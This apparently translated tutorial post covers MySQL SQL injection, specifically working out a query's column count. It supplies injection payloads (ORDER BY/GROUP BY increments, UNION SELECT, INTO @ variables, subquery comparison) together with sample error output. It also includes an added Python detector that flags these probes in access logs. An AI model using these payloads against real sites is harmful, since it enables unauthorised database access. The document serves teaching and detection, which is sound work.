SQL injection knowledge base - MySQL part (3)


    Continued from SQL injection knowledge base - MySQL part (2)

    Tables and columns

    1. Detecting the number of columns

    order by / group by

    group by / order by +1 ;

    Notes:

    ORDER BY and GROUP BY are both used to arrange the result by column.

    Keep incrementing the number until you get an error response.

    Although GROUP BY and ORDER BY are different features in SQL, both can be used in exactly the same way to confirm the number of columns in the query.

    examples:

    Given the query SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';

    1' order by 1--+   true

    Reconstructed: select username,password,permission from users where id = '1' order by 1 --+

    Query username, password and permission from the users table for id = 1, then sort ascending by the first column (username).

    1' order by 2--+   true

    ...

    1' order by 4--+   false, which means the table has 3 columns in total

    1' union select 1,2,3  true

    Error-based 1

    group by or order by 1,2,3,4,5 ......

    Similar to the method above, when error messages are displayed we can determine the number of columns with a single request.

    examples:

    select * from student where id = 1 order by 1,2,3 ;  true

    select * from student where id = 1 order by 1,2,3,4 ;  true

    select * from student where id = 1 order by 1,2,3,4,5 ;  returns   ERROR 1054 (42S22): Unknown column '5' in 'order clause'

    which means the table has only 4 columns

    select * from student where id = 1 group by 1,2,3,4,5 ;  returns   ERROR 1054 (42S22): Unknown column '5' in 'group statement'

    which means the table has only 4 columns

    Error-based 2

    select ... into var_list, var_list1, var_list2 ....

    1. This method works when error display is enabled.

    2. It is a practical way to find the number of columns when a LIMIT clause follows the injection point.

    examples:

    Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

    -1 union select 1 into @,@,@  error: The used SELECT statements have a different number of columns

    -1 union select 1 into @   no error, which means the query uses one column

    Example:

    mysql> select name from student where id = -1 union select 1 into @;
    Query OK, 1 row affected (0.00 sec)

    This query uses a single column (name), so the trailing select 1 into @ does not raise an error.

    mysql> select name,id1 from student where id = -1 union select 1,2 into @,@;
    Query OK, 1 row affected (0.00 sec)

    Here two columns, name and id1, are used, so the trailing part must correspondingly use 1,2 into @,@ to avoid an error.

    examples:

    Given the query SELECT username, permission FROM Users limit 1,{INJECTION POINT};

    1 into @,@,@    error: The used SELECT statements have a different number of columns

    1 into @,@        no error, which means the query has 2 columns

    Example:

    select name,id1 from student limit 1,1 into @;
    ERROR 1222 (21000): The used SELECT statements have a different number of columns
    select name,id1 from student limit 1,1 into @,@;
    Query OK, 1 row affected (0.00 sec)

    LIMIT usage:

    limit start_offset, row_count
    select name,id from student limit 0,1;  fetch the first row from the student table
    select name,id from student limit 1,1;  fetch the second row from the student table
    select name,id from student limit 0,3;  fetch 3 rows from the student table, starting from the first


    Error-based 3

    AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

    Notes:

    Works in environments where you know the table name but error echo is not enabled; it returns the number of columns. (In the examples below the count is read from the ERROR 1241 message.)

    example:

    Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

    1 and (select * from student) = 1

    Example:

    select name,id from student where id = 1 and (select * from student) = 1;
    ERROR 1241 (21000): Operand should contain 4 column(s)

    select name,id from student where id = 1 and (select * from student) = 2;
    ERROR 1241 (21000): Operand should contain 4 column(s)
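A detection-side counterpart, added here as an example and not part of the original post: it scans constructed web-server access-log lines for the column-count probes this page lists (ORDER BY / GROUP BY with incrementing numbers, UNION SELECT, INTO @,@ and the (SELECT * FROM t) = 1 comparison) and flags a client whose ORDER BY numbers form an increasing run. The log format, request paths and IP addresses are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post): 10.0.0.5 walks
# ORDER BY 1..4 until a 500, then tries UNION SELECT; 10.0.0.9 probes a LIMIT with "into @".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /item?id=1%27+order+by+1--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02] "GET /item?id=1%27+order+by+2--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03] "GET /item?id=1%27+order+by+3--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04] "GET /item?id=1%27+order+by+4--+ HTTP/1.1" 500 128
10.0.0.5 - - [01/Jan/2024:10:00:05] "GET /item?id=-1+union+select+1,2,3 HTTP/1.1" 200 600
10.0.0.9 - - [01/Jan/2024:10:00:06] "GET /item?id=7 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07] "GET /list?page=1+into+@,@,@ HTTP/1.1" 500 128
"""
# Common log format; only the client IP and the request path are needed here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*"')
# One pattern per column-count probe described on this page.
PROBES = {
    "order_group_by": re.compile(r"\b(order|group)\s+by\s+(\d+)(\s*,\s*\d+)*", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "into_vars": re.compile(r"\binto\s+@(\s*,\s*@)*", re.I),
    "subquery_cmp": re.compile(r"\(\s*select\s+\*\s+from\s+\w+\s*\)\s*=\s*\d+", re.I),
}

def classify(path):
    """Return the names of the probes found in a URL-decoded request path."""
    decoded = unquote_plus(path)
    return [name for name, rx in PROBES.items() if rx.search(decoded)]

def scan(log_text):
    """Group probe hits per client IP and record the numbers used in ORDER/GROUP BY."""
    findings = defaultdict(lambda: {"probes": [], "order_by_values": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        hits = classify(m["path"]) if m else []  # unparseable lines yield no hits
        if not hits:
            continue
        rec = findings[m["ip"]]
        rec["probes"].extend(hits)
        ob = PROBES["order_group_by"].search(unquote_plus(m["path"]))
        if ob:
            rec["order_by_values"].append(int(ob.group(2)))
    return dict(findings)

def is_column_enumeration(values, min_run=3):
    """True when the ORDER BY numbers contain a consecutive run (e.g. 1,2,3) of length min_run."""
    return any(all(values[i + k] == values[i] + k for k in range(min_run))
               for i in range(len(values) - min_run + 1))
```

Run scan(SAMPLE_LOG) and apply is_column_enumeration to each client's order_by_values; the 10.0.0.5 sequence 1,2,3,4 is flagged while the single INTO @ probe from 10.0.0.9 is reported only as a hit.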

    Original source: https://www.cnblogs.com/luyg24/p/4322541.html